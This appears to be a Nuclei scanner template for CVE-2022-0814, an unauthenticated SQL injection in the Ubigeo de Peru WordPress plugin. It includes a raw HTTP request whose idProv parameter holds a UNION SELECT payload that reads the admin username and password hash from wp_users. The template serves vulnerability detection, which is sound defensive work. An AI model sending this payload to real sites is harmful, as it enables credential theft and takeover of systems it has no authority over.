id: CVE-2022-0814 info: name: Ubigeo de Peru < 3.6.4 - SQL Injection author: r3Y3r53 severity: critical description: | The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections. remediation: Fixed in version 3.6.4 reference: - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814 - https://wordpress.org/plugins/ubigeo-peru/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0814 cwe-id: CWE-89 epss-score: 0.02409 epss-percentile: 0.88721 cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: ubigeo_de_peru_para_woocommerce_project product: ubigeo_de_peru_para_woocommerce framework: wordpress publicwww-query: "/wp-content/plugins/ubigeo-peru/" tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users# matchers-condition: and matchers: - type: word part: body words: - 'idProv' - 'idDist' - 'distrito' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a0048304602210088970d1ad9b03eea7623af5c30186e4cc8a9a019a2b775d700bbaaa3761e986c0221008aafd4e1eaf9720222cb8455699814d4e31c3d892ce11a919fcedf9bb2edfdb4:922c64590222798bb761d5b6d8e72950